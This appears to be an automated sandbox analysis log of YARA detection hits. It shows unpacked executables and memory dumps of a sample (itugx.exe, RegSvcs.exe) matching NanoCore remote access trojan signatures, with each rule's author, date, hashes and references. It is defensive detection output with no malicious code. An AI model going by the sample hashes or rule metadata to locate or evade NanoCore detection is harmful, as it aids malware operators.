Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f71600.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 16.3.itugx.exe.14c7eb0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41bb041.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 2.3.itugx.exe.f085f0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.deecc0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 23.3.itugx.exe.d85cb0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.5e30000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 5.3.itugx.exe.15c6de8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 25.3.itugx.exe.1a20df8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 28.3.itugx.exe.1405da8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 21.3.itugx.exe.141ed90.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.RegSvcs.exe.6040000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth (Nextron Systems), description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 19.2.RegSvcs.exe.41b07ce.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000010.00000003.455419127.0000000001530000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 00000010.00000003.455956530.000000000151D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth (Nextron Systems), description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
